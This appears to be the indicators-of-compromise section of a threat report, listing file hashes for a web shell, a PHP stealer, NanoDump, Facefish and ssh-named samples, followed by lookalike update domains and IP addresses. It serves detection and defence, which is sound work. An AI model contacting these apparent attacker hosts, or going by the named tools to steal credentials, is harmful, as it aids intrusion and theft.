f8f55dc98583aa1fed3e8a57c210d0e1797967c97538cdf08c0699d47a1c0ccc | b8add4ccaa68ca2a112423c1029279a65572052a | da633b55569cbf99dc10814ac546afba |
6ac5dd9d629e696a43d9adcdd5d7bd2269fe3d2f69f7cac3323a27738435ab4f | d841aa317b166751b013dfb56c6541ce0075054b | c61e726fc5d3d6bcb3f5be78f2f8dac8 |
Web shell |
||
ctxHeaderLogon.php |
||
faf37bcbbcaff2de3e4b794bb9eed9e47505cdbed3a35b83ce9a216298779c62 | bf3899623dcb17260137fbd88866938bb6eba826 | dd0c57950f0ce4425a8fb4bac7af6aea |
PHP stealer |
||
netscaler.php |
||
886f3add934cb8e348dcfac78d9e0e50d6d760d065352bc8026529a6bb233279 | 1a6b65c68fb23ba1e09bfe9ee4cc3d497e72ff35 | 34c203634f1e5343396b59f3316f6624 |
NanoDump |
||
nano.exe |
||
1d338978885d8d5effa0ebd9f9dbe2a5eb86494e973c21df96426b2fa428993b | bac24f99eda386eb8044f22e5728479138287622 | 632bf2d5516930765d453daa184e02c0 |
Facefish |
||
libs.so |
||
e79b708990fc39ce917fbca45e9526a7bb7851d7edb52a6b04b5d5e460310308 | 6a7fb0dd0b681ad9bacc95c796d0d0c27840f219 | f90fab637c0e899507ae9f3e8f8bbd13 |
04002de7b9a9364f509090084c65d8e72a59c0ecc307759478d039ec8ba1a567 | 4658240e06b80a8c85b4222ea4140494b2b9b10d | 82e645991a02f7b55d30875cb0443f89 |
1952d5471d9849d371f4f7b8963e19b58a4ab297f1b9cd7389743d7e701b104e | b58488fe15399881c4ba982016f770c8be630528 | 61b0adf3dab8ab7d660268e6fe8d940b |
1a3199d35e84df4598becf234b4ec39f3a30aabb7b6e1002f2016072554961b4 | 66dd0b893bf3eb8f4eea2962d18a5712109a98fa | ebcf4bfb9e997e0c9270ca1a9e1fd417 |
1af1088e540ee1e41da42ff94e75339c3176125e67ed50d3257a3fce863de210 | f349c69495ffcca5fe4aab9d8b1fa5efdac001ea | 8869ff3503ae8c9f91e826ae745cfafa |
1b98f6cfc3d548034d6c58f215aa10553b53af70025d81f606207a2ce89a2c58 | 03b240396cd01bc138afc97932b04089b88289be | d8e795e75dd2a56b050236a50b066887 |
1c7fb07e83d97890baa9edd0ae3e0e1ff0b2577901b502fd0fac5a5b4d0c4ef8 | 19986eee3e63d04265e274309d9fce80436e7ea0 | b460d41fd801424e4bbe7dce8c3ead6b |
1f17cef416f2c8d9549ea301687440e8fd9e4f48787ffd28d44c1070326fc10a | eee7fbc8c4faf705c3dcc816fd0341525031ec57 | 4b0803d70a220a66f5663672f1d4c07f |
222b648a83900c30d3d32fa53bad16518198ce81f3c63a8c5724413bdd38a9d2 | 9e90dd1022e0d04950a186ce7fd85a949b733e6c | e6201d9a55cbafbbed5df49ada48f42f |
2adf2242ff63b01094b8940be5d3d32a099410cef6b6a2fa4917ce59cf55f225 | b94311ee720047f8f74e14f45d970b21ac66f4a2 | 699bf98ae6366f077c875772d6fecefc |
2c5707e54fa639b160e19851cc9276f486dfdef559f3679ecb313c02440ef344 | 27820cba6fd6763ce4ab9eb06a04aedd28754e48 | a809cb705a1b197b0042a0fb38d3cde6 |
2e91e51ee2a0e1142ef4ced4b9134214771421e484a12487f0b422ebe2aab494 | 7aaa0796767b77f191876d374c8f268699d8ca07 | 9258550437d849f3b8f16cfd87891054 |
4ca880437f0f3256861433c7433ead6db932be13ce8064fd76d8e12f462ab5d9 | 2eb3ec0de0a6e070652b03d5005718f23a94d546 | ea75e0b2ece364e97256808ca4c24d80 |
56ce53b6c32beacd8864258c81bf276304a8da20bc0011f5e09d37b95a3e5def | 311f4dc517102691488ef38792cf57b96c54272d | 8e211159f28dd92f2eb73dddcc661e7d |
571003554c953f190b3030dd98a60203ba2a724520ba039bdb82c71c426595a7 | 6bffbac7267109228de10cdd4e9fa791496fb9b9 | 0d6faac08764bf368c8133ce79acd8e0 |
58c49dc1dc8c6bdb85985ae0918e9717045b9e80db5f4b1758ac5b20ad3230c7 | 0f2d92f0ae10497589a29c6922d330c86e198cc8 | cb81071a8ab5c6ad2c0bbfc78ce425a7 |
5bda73410e001727742776de169d508753e6ec129c2db5f12aa80a1bab7bdd3c | ab1241788953a5cf80eb3cff7ffaeafd6015c95e | 741ff27baf97b9d8706439e44b32fa55 |
5d3b5b18fbe6310cf41d45d00012c0a3bcc8a8de6c7140ce574130fa118165b5 | 369f1b8466071ad38fb11b57faac93581c28b3b5 | d6ece2d07aa6c0a9e752c65fbe4c4ac2 |
5ddc96f5c12df7956ba3b8b9a0cec28edfb41cde0be0e9201104d5606ec29bfd | c89482c1cad2e310520a7b09b75432af58a9f904 | 8ee46eebfe1d062e25b34ae0a39eb4dc |
80b953276a7c3e45ae1493ce73539cfb55d33740bfaadc5a7ff39ea81a99a02c | c71674522fcd9e59be922e74143c6f2605e88440 | bb0dd8f139dff25bf0299e431652abac |
815687d4f48188b65c234fcd8b6c29b0cbc101fedbdb7b2a4f9835c9f628e59e | 986c51484ac75257d771e4b5b93b95beec05744f | 4afe107cc3bcb6efe7c0e21a171f89b1 |
82a9f9bce040abf27d833520a92c469340e1939e1609d36bb926bcd22ce466d9 | 41a90b533931314a261dbdc1a694240ee4ccc141 | ef6586db892316ce1bebc1f77c7b5165 |
86bb89e1f3e71973674360b564d48f041114a2d5956e35152fd60b518dd2c7ce | 03b0ea28523cb1c12d7925454ae972c1a9817b03 | 438cd8fd8d8c42f7ca639d9d2d8e79d9 |
8ad8ee8a748daf62235a541fafd6625ce066892bc8890b1ebbe5c95a9b194559 | 79d696227754b1e704d0e466735e0fff5b73836f | 40ac792834656304daaf43a57ca8cb98 |
8aded9ff1f808541db0c5c377a4a3bb7a27c69ef95a203a1433f5e90ea7119e0 | 25b143f37057b8567c9d65aa4439515f068398f4 | 7c4891c5ea1bc0f03ab6792991821dda |
8f32c8f40290417c512612cdc33ef25e760bcd96edef60b9458c2fff7cf45f07 | 523eab1c3cfd0233001f6e88eb0ff277d5366828 | 67e75d20e29e470ec05366ba760cdaaa |
9227ae0e3e74d72c0cb06e90f3adfab111241defcaa2c736429269edc8153515 | bd0dfae3da23970ae0cb0c64cb8a7ad0c6a1c627 | 7f47738ce4ef7708392cd7776da1c213 |
b7f36ffaf9057f80f9124c0be5fae66011af05887e1090020fadc3c2b2ac0322 | 865e82aa9498b3291a5190fdf3c1859e6ba4467b | ae815a8e0eca62c6dccdef1896f15a98 |
c4c192aa64c4467309ec41f47858f4bdc9bef1d9e054964459b46816d3d89a10 | 79867a2d1dfd29d759b457a2210e8c8c1d5a9210 | 790870f96208d448522f0b1b5fbf3c08 |
d9a25ac036975148fdb6069382701bf90e3cc8f1028ad97e4531857644590665 | 5b453ebad7935cfff28d83d69bcc4bb0db4ade93 | b7bfbc7f3188e11a090655fd9a69b5ae |
f51e83a53dd3a364709b1d0b93489f7a114b529268c3bab726ed288eba036bca | 6d7f5acb282c8f2ddfbc9b92f85c055ae6fbd69a | d904e85354ae4019a818e251a31efcfc |
f9022639a4a8b361497bb68dab09c5386205ede7108824493e0b722f786a73ee | bda89000a5d0bee8516b0041a1d70cc9039b5924 | 4ae7bbf0d7e0f3006c6e109c5204f031 |
fc962c3ef76527e7310f36b4a2a046b7e0c6287a6bdd8b9fe187162f7bb38658 | 3622f85a85dd77f4553e7677c6c42edec5f16747 | bafa89c6eeb352d26651d8446481d636 |
670cb4c0eecf5d43f264c8fdf06d83d64022de07ca14da74e393f99a374283d4 | 286d3bfca62b3ebe59f3b45d5f7e2349ccc411bc | 1db16cfaf3bed9915277f92112e2a950 |
76ac7901747b809001fb9e69151c93a258bdb44614b65141ca7a1c750a75442e | cb70155e8f3a016ab9d360019bb85477aee25f0e | 6d7f7d6ad3f4421f41057d25627c8324 |
91a125da02c7958b21d93c0b2ebf843086be50f69b8a7330da8440d911bdb3ad | fcc5e457b835613485104df5011f85e8ac3f266b | cf31771a9f75aae6a74013edb87120ee |
936ca431d17d738beab9735a3d6e658ff29f8337f52353fd60e286c94dd2c06b | 04958d06c7300efaac9f21b877957048e28e2198 | 8a11e27b749624bedb2cfe24d30103a8 |
e2867fe7c85c02942df27d4c001db3889b9373ff38a1e80bae852a0dc3ce480d | 1ad3fc0c9856391362fa2c96f48e833b37784e36 | 4ecea6e9ffb8197766ae4cd144f9a73d |
e687c9291818f280c37a3e43a7dbf2b6c3f2cabd72a014b63cf3332fdc707753 | 7b3f84da6ccb820882645fd199ead782eddb97bb | bc0e8ef8eb7ecaa6571a9be9998c407e |
948b6c5fc1ba74ed57388241d1e8656e0ca082d10ff834c628d01c592764926d | 3d43a6cf71d7a36a6bf6be24eba59dbe1b67187b | eec106e4850359e3c99769d6463cffc2 |
2c6388cd037305587b087467407fdb6cc46d4fd57eb125ea7d2486a231adb7fa | 69e459e79141de203ddd1031572de0453fe11814 | c41e21b672725ecb403aacf684f80d43 |
76045064afabaa67903b4c261b86813a7bd8b326d08bd118adabb8695ae34c1f | 4868ffbe97250068d1e1ad55617585ea92a7e80b | c592dae9a8113352627d6b39c97e7df8 |
ssh1200 |
||
8b7f948434a6b8110b1a9aa2d909d58cff29cbc1e1169aabea4aefddcf5047d8 | 96e06691a3c430aac9c43a2bb2b347dda88e4ade | 45849dabbeff5e80c8acd51ac9662748 |
ssh3600 |
||
42c3920bcece0fcdbb5060be7d5f46effeaaa14971de0f31f824b53029568cb8 | b38096a7d8614ca5c63a71baf030b6d035db0891 | 49afe50aa8061ae5d3e4eb3f62e06ab3 |
90013bb9f389c316e3df3ad8b57a837cd84f80a509a086618b9dce18e82d4244 | aefa624ca63b8cd69960972f7e3f3fa5fbf30f5c | 5e25ffb58c8ce10bb06daaeb41ccfe8f |
c50bd9865ed65a9c298768f245d8eaff1baa410735ff5673a73d1411c425b7c6 | f68370b3b55fb0d1958b4c132b7722b39672f1bf | bfc23a5da6890c8f81abb7d918090e69 |
sshins |
||
ab9cc4ee82aa6f57ba2a113aab905c33e278c969399db4188d0ea5942ad3bb7d | f7d95a887a51fe97ce64a93a40196b2cccaa80d8 | 38fb322cc6d09a6ab85784ede56bc5a7 |
c787e57a8077f0df838ae416cbf6dd38ecc670e532c3369bff2ef571cd94d36e | 79361214b0508e620b568414c4ae0d4b00e885a2 | 63dc3037bf0022e2d281f0463529bf60 |
c8df513e9e4848e35af5246a2ba797540b68a9379a1df17e34550cb0258960e8 | 65730632bb30583f0a406afd1153840367db8f1b | 601c24c1ea5c38d47dd008260c510ecd |
Сетевые индикаторы
Domain |
420021.com |
avptp.com |
deadork.com |
download-attachment.xyz |
eu-debian.com |
fsbkal.com |
getanaccess.net |
infousa.xyz |
kavupdate.com |
knlrgb.com |
linuxupdate.live |
lib.rpm-bin.link |
logilokforce.com |
mirror-update.org |
msngrt.com |
onepostlive.com |
ptnau.com |
saakashvili.com.ua |
ukr-net.website |
updateld.xyz |
winkb0172.com |
wsusa.xyz |
stoloto.ai |
IP-адреса |
64.226.104.111 |
51.15.18.85 |
138.68.138.197 |
146.190.23.86 |
157.245.37.121 |